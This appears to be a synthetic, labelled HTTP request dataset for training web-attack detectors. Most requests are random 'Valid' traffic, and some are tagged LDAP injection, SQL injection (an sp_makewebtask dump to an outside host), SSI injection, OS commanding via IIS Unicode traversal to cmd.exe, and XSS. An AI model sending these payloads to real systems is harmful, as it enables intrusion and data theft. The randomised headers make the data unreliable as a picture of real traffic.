Content-Location: /fvwece/Rlsq7.swf
Content-MD5: bHlUT3RleXVwdGRsaDgxbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 02 Sep 06 03:07:50 UTC
Last-Modified: Sat, 19 Dec 09 08:28:31 GMT
Host: 29.182.215.19
Connection: wntEonnw
Accept: */*
Accept-Charset: iso-8859-6, iso-8859-15, x-mac-ce, x-mac-turkish
Accept-Encoding: gzip, gzip
Accept-Language: dxhsge-oaaa;q=0.0, 8ddcE-l8q;q=0.3, Ih-edcyte9h;q=0.5
Cache-Control: taitAis=lya
Client-ip: 87.1.179.160
Cookie: htrooNeRrh99=68977
Cookie2: $Version="54"
Date: Wed, 12 Mar 08 17:53:42 GMT
ETag: "IjdlVhbVYs.R6Wfd"
Expect: rsAyl
From: vie2r@nrt2Rvu8ma.org
If-Modified-Since: Sat, 26 Jan 08 19:05:53 GMT
If-Unmodified-Since: Fri, 07 Aug 09 21:51:46 UTC
If-Match: "ytIv_7VFSPvXvBO"
If-None-Match: "dtAKphgxS7gHMp3x0K"
If-Range: *
Max-Forwards: 3
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM ZUxsc2pyc05oaDZlNnRzZWxuZWVzZUVpNG4wZXRldzVoaWVobnpwcmFlQ08=
Authorization: icas ndtq69r=ugd07acn
Range: 20567-6258,-56087
Referer: http://www.tplsy.de/aat2l6fd/hfoEo/ass2.fgf
TE: trailers
Trailer: Host
User-Agent: iednqwhL/6.4.2
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 373x2208
Via: HTTP/1.2 183.14.249.39, FTP/5.5 www.oihblr.js:03
Transfer-Encoding: r7O4gS; izet7lai=otrhji
Upgrade: nceno/6.6, dCa/0.3
Warning: 045 www.elolydv.png "pbietttuaolq" "Sat, 01 Sep 07 19:08:20 UTC"
X-Forwarded-For: 4.132.206.75
X-Serial-Number: 6352677
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

akjmuCRhtudEse=@0a&uaElxop0t=$nes&osfeu=nRBkiZoGOKH&5RhcoseROn0wne=Mhe

End - Id: 32799
Start - Id: 21139
class: Valid
GET /epop4YnfO/orEzgroup byMEE9eQ/4ue9lwOtacy5egTa/siuon4yttds9vseci4s/Vck770/Q4/amiee7eK-Jv5h/eoRte/aEzEJXGU/zEUtzRhOJ/nY.dll?jtefS=boadcA&andpGpW-=nS0nxiroJperaige&ereeqWr=03918461&tec0t=0041814 HTTP/1.0
Host: 93.171.214.83:80
Connection: ernn
Accept: */*
Accept-Charset: iso-8859-8;q=0.0
Accept-Encoding: compress, compress, compress, deflate;q=0.6
Accept-Language: *
Cache-Control: a=mdsnwoui
Client-ip: 139.120.122.69
Cookie: xhkEtohe0poo=191154807;ru=ps~(ot 15eIselect;DdpNvf=0440
Cookie2: $Version="38"
Date: Sat, 07 Apr 07 19:22:40 UTC
ETag: W/"rYpvRQCgPrvfa@KdA"
Expect: tetnMsTh
From: dhehtais@ahehpggov.uk
If-Modified-Since: Wed, 12 Oct 05 05:11:51 CET
If-Unmodified-Since: Mon, 21 Dec 09 23:13:44 CET
If-Match: "@evgprQnZYTwDVDJrg"
If-None-Match: *
If-Range: "5tUwn5cJ2C@PCXgQ"
Max-Forwards: 122
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM OHV1MmUycm1ucHU1OGVvbjdhclIyb3RpZTJsYWVvYnI=
Authorization: Basic YTRlb3I6U3Nla25j
Range: 3-
Referer: http://tn1x.cz/attehnni/thidw3S/aaaCtea4/m0ket6l/i8bf2Stt.dll
TE: trailers,deflate
Trailer: Connection
User-Agent: nito/2.5.3.0
UA-CPU: PowerPC
UA-Disp: 595,813,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 739x758
Via: HTTP/3.1 110.238.46.49
Transfer-Encoding: eonr
Upgrade: olhOla/3.4, eiCcnJ/2.6, t0pcs/1.5, eshn/2.6
Warning: 554 www.g0den7.shtml "imsucel" "Thu, 03 May 07 11:10:04 CET"
X-Forwarded-For: 121.247.72.172
X-Serial-Number: 9779680
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21139
Start - Id: 32627
class: Valid
PUT /uZJcK0@SWzB/from9FCw4g6RZ4/ieup/nuitZhnpxmisat/nTjMI@Y7l@m.js? HTTP/1.1
Content-Length: 302
Content-Language: it,A3m
Content-Encoding: deflate
Content-Location: /owtslra/aoenhrci.wmn
Content-MD5: NnltbWs1Nm5pbmh5T0lzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Jun 07 22:47:05 UTC
Last-Modified: Sat, 03 Feb 07 12:04:47 UTC
Host: 48.133.253.31
Connection: rrsaEht
Accept: image/*;q=0.9, text/*;q=0.6
Accept-Charset: windows-1254;q=0.2
Accept-Encoding: gzip, identity;q=0.5, compress
Accept-Language: 9wt4nv-sml, ee-TtoYdl
Cache-Control: no-transform
Client-ip: 83.101.124.16
Cookie: thsciecs=q nes'qtahg;4TBu9= execdttowgr;nkT1J7O=91;tttOsrrdizHnioo= t+;fkh8u=adr
Cookie2: $Version="4"
Date: Thu, 23 Dec 04 19:43:27 CET
ETag: W/"GzkqMzo-hqir2utZSC"
Expect: dw7ie0
From: mhhvcrm@gtad.de
If-Modified-Since: Mon, 21 Aug 06 07:42:42 GMT
If-Unmodified-Since: Sun, 07 Jan 07 24:35:58 UTC
If-Match: "WgZfZRYMnyUm.LJRlmSz"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 8.6
Pragma: owtgzwro=tdft
Proxy-Authorization: Digest username="tteg"
Authorization: NTLM b3RvZWl1b3NzYWxlaWNtYmVOZWZ3cmY5QW9hZE1sMkVkYW5p
Range: 0-468
Referer: /rFuA.doc
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: etndayrrmx (fluQXO0; n3OP.1lQ)
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 853x924
Via: 3.3 152.86.156.169, weoy/6.8 www.6eoa.js
Transfer-Encoding: gzip
Upgrade: Mit/0.5
Warning: 934 www.j5tsa4oe.jpeg:48 "4w2ssa" "Thu, 02 Nov 06 18:45:28 UTC"
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 73155166220455300
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

tehel7tne=i] 6-&eh=z&iKnnoor=875342&ehTnibrfi6e=692&hqe=servicesyi6)&thce=tEttnrtLnlechoImmOmgca&t3n=eSincludebescriptbsaservices?r&een&tqeis=ttnEtet9ueipbxei&Haetmp=iCJy&unionSO8cgwnznw=Yea&vobject@body0dr=saanjeejsaDi3e&or0phomeZFnUA=18&5Zb7=239&_Sz.=passthrupw-roathe3mirdha&sbAseopc=6582053

End - Id: 32627
Start - Id: 8118
class: Valid
GET /bwremeh7eosedOuo/Bb@a9QFB.asmx?J1XV=orocpm6Ro&D0oEyahVfesmui=hR5dfnat7nc&theteaElodemiTl=otaeaScopyclyeh&ienE2ohetrm=7lidev%3Eplaselect&freatrdisltiia=bDCoANjuwK&swer4=aou&lhmjs5t1lAR=n+&ziHo0s2nnel=At&n38dooniussyi=znusno&srladpdaoxo=4&odooleh=aqmEI4-26LP&JSic=Qylrtllhdc2h HTTP/1.0
Host: 38.27.174.192
Connection: epxna
Accept: */*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 76.173.9.181
Cookie: aatthlc=adyr55U
Cookie2: $Version="85"
Date: Tue, 18 Apr 06 22:16:55 CET
ETag: W/"JNO.G5qjFA0TM4_"
Expect: 100-continue
From: rresLtr@tskRf.com
If-Modified-Since: Wed, 15 Dec 04 24:28:50 UTC
If-Unmodified-Since: Sun, 01 Aug 04 14:15:05 CET
If-Match: "7xuu_bUhiWE6GpOI5"
If-None-Match: "SsLf1EHc4CHrWDXIYSV"
If-Range: *
Max-Forwards: 8
MIME-Version: 7.3
Pragma: adse='He'
Proxy-Authorization: Digest response="2b79C4EDCA0d95fFbDfB52b2ADbdd7C0"
Authorization: Digest realm
Range: 96926-503180,-72
Referer: http://www.onueng.biz/yrvcuh/2glai0r.wav
TE: gzip;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/5.3 (X11; U; Unix 7.4; sd-8l; rv:4.7.7) Gecko/69438241
UA-CPU: 68000
UA-Disp: 4009,1990,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5707x274
Via: 9.9 152.110.222.214, 3.7 www.mSlt.shtml, ttctag/4.8 222.138.230.125:9
Transfer-Encoding: deflate
Upgrade: hossa/8.6
Warning: 489 www.eptt.jpg "7ceEepaUoi6" "Mon, 12 Oct 09 20:07:00 CET"
X-Forwarded-For: 17.216.217.132
X-Serial-Number: 35345
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8118
Start - Id: 3124
class: Valid
GET /sst.gif?hoerken7urodS=%2F+xm07%24au&8l1rlse065.4=yrlrat&pSra=qe&lonrdAiezg3z=IdCcl7OlTyq&3tph2hned3hfrge=os8sEdomoepkInye&ean=tKu0PoHg%40E HTTP/1.0
Host: 100.102.193.17:1895
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-7;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: 9retiggl=at
Client-ip: 53.213.84.202
Cookie: 7Oninotiniartce=fPZSaK;okin=2580214510;xgrrJH=tltehslAwlit8eiaT;Yi=3x|e-e4zusrsirnEusnRts;7_ET=of~y5'adminlst
Cookie2: $Version="133"
Date: Wed, 24 Jan 07 24:28:00 GMT
ETag: W/"k1bDH-QRD6giy00AGJ0"
Expect: 100-continue
From: eead@01e8oq1.gov
If-Modified-Since: Fri, 02 Feb 07 12:25:02 UTC
If-Unmodified-Since: Sat, 17 Jan 09 03:55:19 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Feb 10 22:14:06 UTC
Max-Forwards: 688
MIME-Version: 9.9
Pragma: n='da'
Proxy-Authorization: Basic OGlhbnVyb2U6ZGZqb2VyZWE=
Authorization: Basic ZWNub3lSY2U6YW1ydHNhbmc=
Range: -6106,0309-,1-
Referer: /lyart0eK/maaes/hshsw/avMe9o7/piiboe.avi
TE: deflate;q=0.4,trailers,trailers
Trailer: Accept-Language
User-Agent: wyhptmh (9T5mOEF)
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5219x775
Via: FTP/1.9 www.mfHi.css, 2.2 www.ireamne.shtml, 3.0 177.63.7.182
Transfer-Encoding: gzip
Upgrade: s2let/3.4, e5ew0u/6.3
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 1722875
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3124
Start - Id: 38369
class: LdapInjection
GET /Hj8B/nBJ0kd37/vaSAEv/aN1HApscHs8uVNna/eW.css?X75AKo9Rmocha7t=en%29%28%26%28objectClass+%3D+++oot*%29&p705ee=dNhtaccesys%26entseMphpafcopyTnts&7AWzv-ezL7fU=53e%7Cstylefxb1aouftpnheltmi&ZapE2LW=ny60awhere%29tlt8wp-Ai60uf&feBw2w=aohsGtj&aylxe93otoars=215&rAixon0=8d+rr&dE9etO=oo%27bgsound&a2tefiifher=ra HTTP/1.1
Host: 155.2.4.59:97
Connection: keep-alive
Accept: video/mpeg;q=0.0, audio/*, application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eo-0;q=0.4, ayw-rui;q=0.1, hahfgnde-ord;q=0.3, EEieA1-s;q=0.3
Cache-Control: no-store
Client-ip: 152.74.253.224
Cookie: tdy4jsahtoaA5lp=14;VBXwQRUgK=5aL4MLnlx3x-;cnojah=?uaa0zrs \hnexo
Cookie2: $Version="9"
Date: Tue, 04 May 10 22:00:58 CET
ETag: "XdKqihpT_MZZjEK6G"
Expect: 100-continue
From: frlm@ctsi1ez.ch
If-Modified-Since: Fri, 24 Dec 04 16:31:53 GMT
If-Unmodified-Since: Wed, 19 Dec 07 21:49:55 GMT
If-Match: "d3QqBsEjQtALlk0wU"
If-None-Match: *
If-Range: Wed, 24 Nov 04 12:17:25 CET
Max-Forwards: 4
MIME-Version: 8.9
Pragma: erFeeaso=pofiendi
Proxy-Authorization: agin 7Gqd=SEesnE
Authorization: Basic MWF0cmFvc2U6Y3NycHc3
Range: -0,582766-
Referer: http://rou07hdp.gov/ttbA.jpg
TE: chunked
Trailer: Referer
User-Agent: Mozilla/4.3 (compatible; MSIE 7.7; Open BSD i586; laejo03; vhkinomI; rvmeiaio4)
UA-CPU: 68000
UA-Disp: 8585,869,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 231x314
Via: 6.1 www.tsBshuqe.htm:7946
Transfer-Encoding: 7Sni
Upgrade: ooh/1.6, rCeq/8.8
Warning: 625 www.tiqr.shtml "a8aoszhaq" 
X-Forwarded-For: 251.153.108.27
X-Serial-Number: 9579642646846
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38369
Start - Id: 2790
class: Valid
GET /EtpmegidlATpsree2/yBevsainemdms/azwS/tnlia4iafltasefdqzl/IHRGHphavingsKwzQ/MCodvLeFzi/moiogtm/ENVIP2Q7sk_Vfy/ns1LZlg9uuN/a5mcHNc/p8PupUnDRe.aspx?PE2I=25&dteopEeIxsrbyC=810505&laire5=v&4kwyrlecdeo=1uahax&9s-x.IOGea=800&erexc=cbVOu&nsraverLdh2hAd0=See3sihain8h1&tatst5ds5cO=tgEiNmoox&gue7i=11189695&d7=sof&-0EIoXpassthru-_=7&eitdinssegro=92751781&peeotebne=b%5Cj+ HTTP/1.0
Host: 41.227.20.10
Connection: close
Accept: text/*, video/*;q=0.9, text/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=0
Client-ip: 196.47.7.205
Cookie: rtm=893;0cP2o_MdeleteWUP=Pf;eaeoMspoenndunt=7coni;d9EYouhcalh0dr=ua4a4logretb;ad7gRa=tfl0vaE]thclrsanu
Cookie2: $Version="49"
Date: Thu, 27 Jul 06 13:44:55 CET
ETag: "Ddx8ftvn5TLLcJFhel"
Expect: tdtn
From: tdhre@eo8i9.de
If-Modified-Since: Tue, 25 Oct 05 08:27:40 CET
If-Unmodified-Since: Mon, 20 Oct 08 06:30:32 CET
If-Match: *
If-None-Match: *
If-Range: "L2.D4qhE8JEqd_Eyxao3"
Max-Forwards: 1
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: leAtd gaxt=n4pbnae
Range: 653260-,8-79,061108-10
Referer: /s4eto/i7stdsnt/Tpvk.bin
TE: trailers,deflate;q=0.5,gzip;q=0.9
Trailer: If-Range
User-Agent: itni6duoeufteooem
UA-CPU: Sparc
UA-Disp: 604,2690,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 944x3965
Via: HTTP/4.1 224.236.38.202, 8.7 93.57.155.209, oln/2.8 www.b2gtri.js
Transfer-Encoding: deflate
Upgrade: Sbhjos/1.1
Warning: 646 www.AeDo.jpeg "ecttnoa" "Fri, 13 Jun 08 18:30:30 GMT"
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 82627
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2790
Start - Id: 41151
class: SqlInjection
GET /dngHawe5b/etehn/sx_FVL5Ix/a5oQp@2hpL0X8.sh?JuIRbin0rM=%27%3B++++EXEC+++++master..sp_makewebtask+++%22%5C%5C130.126.37.43%5Ce3%5CieNta.png%22%2C++++%22SELECT++++*+FROM++++INFORMATION_SCHEMA.TABLES%22&teaI=q HTTP/1.0
Host: 108.250.136.147
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1253;q=0.5
Accept-Encoding: 
Accept-Language: yheFw-gtn, 4-uqn, exna-eltm;q=0.8
Cache-Control: max-stale
Cookie: system2XCNbHW5emo=its
Cookie2: $Version="24"
Date: Mon, 16 Nov 09 20:36:35 GMT
ETag: "kySf-tR9OR..Mwo"
Expect: 100-continue
From: etcosIO@avtere.net
If-Modified-Since: Mon, 07 Aug 06 05:54:20 CET
If-Unmodified-Since: Fri, 23 Apr 04 07:04:21 UTC
If-Match: *
If-None-Match: "Kv6gMT@eA1FO14etD0t"
If-Range: "vT0rCWjKTpjr2T7kNG"
Max-Forwards: 1034
Range: -024
Referer: http://syeofoi.com/hnd7eaer.tiff
TE: trailers,deflate;q=0.6
User-Agent: Mozilla/2.6 (X11; U; Solaris 4.2; d8-tm; rv:6.4.2) Gecko/01404805
UA-OS: Windows 98
Via: HTTP/3.4 www.editeae.shtml, 9.5 www.brdEs.jpg
Warning: 317 5.218.126.84:2 "bdhuhPeStawrDs" 
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41151
Start - Id: 28518
class: Valid
GET /bvyewa4n3u3Sxtetbhga/hwUn6lK/o-UU@TzL/tSpttateuag8.dll?xi=124518 HTTP/1.0
Host: 76.139.29.63
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=2059
Client-ip: 86.240.167.85
Cookie: da4=tftsilnXewc;aaameit=abinieool
Cookie2: $Version="176"
Date: Tue, 17 Apr 07 01:30:20 CET
ETag: "jmReQoYtuN@ae9Y"
Expect: 100-continue
From: tlmuhe6G@iElga.org
If-Modified-Since: Thu, 25 Jan 07 17:36:12 CET
If-Unmodified-Since: Sun, 16 Mar 08 17:17:37 UTC
If-Match: "mGZu@dswMCodRSPWdW1"
If-None-Match: *
If-Range: Sat, 09 Sep 06 24:32:13 CET
Max-Forwards: 2550
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM YW9zYWM2bmVhdW0yZXN4aGVuaXF2cHM4bDM2ZWRlcjBlbG4=
Authorization: Basic b2xleGk6bERhc2E=
Range: 7-93,534-66746
Referer: http://n3rae.biz/cainc.mdb
TE: gzip;q=0.5,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.1 (compatible; Konqueror/8.5; Win98; thslhxbea; ohsA; dgi0cnaNs)
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x668
Via: 7.5 241.35.45.89, 6.7 www.eiaz.jpeg
Transfer-Encoding: eeqema; mLnsh=o4dggaeS
Upgrade: ssc6/7.2
Warning: 910 www.legsia.css:7 "totaiqAI" "Tue, 27 Dec 05 09:24:47 CET"
X-Forwarded-For: 32.243.80.201
X-Serial-Number: 42227598156350545676
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28518
Start - Id: 38435
class: LdapInjection
GET /rxMmIdkZXpdroplG9n/AeltK70qohoaImm/TuenbetweenfcsxwK/swM/6B1K/tuearwxawsai/b.G@MX.jpg?nhap3deut7=0&edntaoE=rs3Ha%29%28%7C+++%28fe0ca%3D*%29&le6yuerlaotiret=fl1nvmeoekihu&sbgowenkdxsiUer=h9saashdotmlwiTr HTTP/1.1
Host: 220.33.134.67
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312;q=0.4, x-mac-korean, gb2312, x-mac-arabic;q=0.1
Accept-Encoding: gzip, compress;q=0.8, deflate, gzip;q=0.1, deflate
Accept-Language: cfra8sh-ejar, V65-3f;q=0.8, dln8t-cietbzs, e5rhIlK-tr, emtf-Sse5me
Cache-Control: no-cache
Client-ip: 91.250.232.64
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="91"
Date: Sun, 09 Nov 08 04:58:30 GMT
ETag: W/"xtXrh_nP5gn7GdAL"
Expect: 100-continue
From: it2uy@ylrV.fr
If-Modified-Since: Thu, 07 Feb 08 07:53:51 GMT
If-Unmodified-Since: Thu, 10 Jul 08 13:09:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3456
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest username="aSaCs"
Range: -03,38-
Referer: http://5mxoller.org/aecAsbwo/pznf/htmoay/leantiyE/iLUnepa.conf
TE: gzip
Trailer: If-Range
User-Agent: umcopg1o/0.0.0.5
UA-CPU: 68000
UA-Disp: 6654,995,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 040x944
Via: HTTP/5.6 www.nfyinLsr.png:5088, FTP/6.0 www.hnaeu7si.tiff, vhoat/7.0 www.gsod.jpg
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 968 137.187.216.156 "d0uqrloAeea9aicnUoc" "Mon, 22 Mar 10 04:21:49 GMT"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38435
Start - Id: 40791
class: SSI
GET /tadCEXQSynuE08/r1rasihth25aoz/pHrUFv0q-InW6gj/YCZaTNVWjU1/ee/divL/uey6dzeEOdiyrsrotmIf/locationB_Gg1replaceRgduUig/77R4L8.html?hwhpq8dwuandeT=itbwindow.open&e5E7=rSntisock_streamhavinggen%3B+hs+ulgM&esoaWTsphucc=%25h&orsaolI8e=%3C%21--++%23odbc+++++statement++%3D+%22select++++roniFf%2C++++thi%2C+++++hj+++++from+pbUmm7eH+order++by+++1%2C+++++104%2C+++9%22+++++--%3E&a21EeNo=%26oaan0%29%3E1&c1Rexrhl52whzt=4Q5te3FCVvZ&MXCjmochaXrg=uoW&8sop6tNwoa=tLhMlY68&nsmdphhTtn=hDfH&goen7nanr=tiogxdt3c&t4Q0v5v=2268 HTTP/1.1
Host: 23.8.203.241:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, deflate, deflate;q=0.1, deflate
Accept-Language: tcehcde-1dk0als, naa-mwzb;q=0.4, vllo8ri8-t;q=0.3, EttmP8-Im4yheaN, l-sa9emng;q=0.2
Cache-Control: min-fresh=25
Client-ip: 79.174.208.245
Cookie: TGPFbmetai=ocwxitn4onse133lq;Pxesoe8nIlnnE=sEr4@T_txDr;andcWenzdljj=(;tnlsdaq0TlhHjsn=01;qLwY3tc=99;fisS9=6444906
Cookie2: $Version="363"
Date: Sun, 04 Feb 07 20:16:44 CET
ETag: W/"W9T0XsxJpfJzhTByMX"
Expect: nsirg=5AerheO;iropdi=icem1yli
From: iipxpA@IasrDjh.ch
If-Modified-Since: Sat, 10 Oct 09 24:29:06 CET
If-Unmodified-Since: Fri, 30 May 08 15:26:43 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0301
MIME-Version: 2.9
Pragma: 3ntirq='oy'
Proxy-Authorization: NTLM T3Zob2lzcW5lcmxidmVubnNpcmYzZGVmdGNyM3Vod2xvdGJs
Authorization: NTLM Y2lsZW1yb2lpckF0ZWFFUG9FMTY3ZVJkbmk0dGRpYWlkenBzcHJwa3JsYW5l
Range: 6294-616374
Referer: /dnNro/rkeyr05/emcidi/ehaaseo.css
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: i8oeieeewfhKta
UA-Disp: 5062,338,8
UA-OS: Win98
UA-Pixels: 4833x5333
Via: HTTP/8.5 101.28.60.155, FTP/6.3 www.ntem8p.tiff
Transfer-Encoding: compress
Upgrade: hfheyu/3.0, aae/3.8, rsayt/5.1, moh1r/4.2, ryonhi/6.6
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40791
Start - Id: 6687
class: Valid
POST /nUe9tchttcMi/hL8x/nHtKQubVNIhB0/ipggvdislnlserr/grMX@NbTBRe2VSZPiu/uJ1DSb7C20Yb/YPmm1wacopy/lmefcR/gnqq/nar3actledceaeou/uRtCNG5hxyd/eVN4aohEiC5.swf? HTTP/1.1
Content-Length: 149
Content-Language: SnadTpin,nap65
Content-Encoding: identity
Content-Location: http://www.eanuv8li.org/smEet.css
Content-MD5: d2V1c2RzbGZlZjhzdGVzMw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jun 07 23:24:58 UTC
Last-Modified: Sun, 15 Jun 08 01:45:31 CET
Host: www.8rdan.cz
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.3, cp-950, x-mac-roman, windows-1253;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: ob6-tet;q=0.7, h0-rh1tl;q=0.3, zRncirSd-f6stThMo, rth-ndadJru
Cache-Control: no-store
Client-ip: 131.52.255.205
Cookie: 3dAw=628;Annur3csoltpyo=9280625;lsa35adesT=@M|1B2 o=oI;1eeexmlE1;KnPOuXu=ant;asio=80731
Cookie2: $Version="1"
Date: Fri, 26 May 06 06:23:17 GMT
ETag: "aUAEYweAIy_FKSmYU"
Expect: 100-continue
From: zdrhgec@dEoecfiph.com
If-Modified-Since: Sat, 24 Apr 04 18:10:01 GMT
If-Unmodified-Since: Wed, 01 Oct 08 04:26:10 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Jan 08 12:43:07 CET
Max-Forwards: 038
MIME-Version: 7.7
Pragma: Ai='tdfsh'
Proxy-Authorization: Digest qop=auth
Authorization: NTLM ZTYyZG9laWN0RW9hNGU5bm50dG1pbnFnZXdhU3Nia2tudGR0Umw=
Range: 954790-0,-841813,-6
Referer: /oeirsye/haMp/gdBeT/hhgsah/eEett.jpeg
TE: deflate;q=0.0,gzip,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/3.0 (Windows; U; Win98 4.4; 0m-t0; rv:8.7.0) Gecko/78208923
UA-CPU: x86
UA-Disp: 8391,040,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 075x397
Via: 0.3 81.197.94.197
Transfer-Encoding: gzip
Upgrade: tuerio/7.1, 9oaf/9.3
Warning: 435 2.165.17.143:840 "omshwmst1" "Wed, 09 Nov 05 13:34:42 UTC"
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 688311326706532
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6eceaqmcoith=91172&32zbnO=748&ElosoaFe=geAreee&iodmilloavga=le&7mite=do4duoEoie0ewp-u<&t6noh5l=ep&eottttaR4elink&owsn=wT\r7Zea\k5 tca&k2tn=sr

End - Id: 6687
Start - Id: 44519
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 2.192.18.26
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-ce;q=0.1, shift_jis;q=0.5, windows-1257;q=0.0
Accept-Encoding: *
Accept-Language: ewtr-oirtt
Cache-Control: min-fresh=422
Client-ip: 108.61.204.42
Cookie: Eadjaliet=e_uqTYYep;errndc9e=nVCKPxQ6OM;geH-RvR9=3567216;tfksitDnieRe=oJZ4kH05-h3
Cookie2: $Version="817"
Date: Sat, 23 Jun 07 09:16:45 GMT
ETag: "6.58tUusJo7_pzi8ZM"
Expect: 100-continue
From: bsntalu@ofn3s.de
If-Modified-Since: Sat, 16 Apr 05 13:06:37 UTC
If-Unmodified-Since: Fri, 06 Jun 08 01:04:21 CET
If-Match: "OYpkBKwDqtc@BqL"
If-None-Match: *
If-Range: *
Max-Forwards: 89
MIME-Version: 8.3
Pragma: iitshoiw='uae'
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: ienbeh ieerread=snqackgo
Range: 0-753213
Referer: /Tojeaewc/eogtfei/QcAec2f8/teCasdaH.txt
TE: trailers
Trailer: Warning
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 2.7; iI-ie; rv:8.1.1) Gecko/25792188
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 455x841
Via: FTP/8.0 224.201.12.254, HTTP/6.2 162.188.248.208
Transfer-Encoding: compress
Upgrade: c3oe/1.8, sib/4.3, apenZ/1.3
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44519
Start - Id: 46539
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.1
Host: 115.106.192.11
Connection: close
Accept: image/gif;q=0.3, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 4.189.24.120
Cookie: srnblaIaksxt=1823
Cookie2: $Version="0"
Date: Thu, 02 Nov 06 09:16:47 CET
ETag: "FxExs_7zdzC0e3NG1kI"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Thu, 27 Apr 06 01:13:23 CET
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: "9oYjg2GYAoSOmeeT-f"
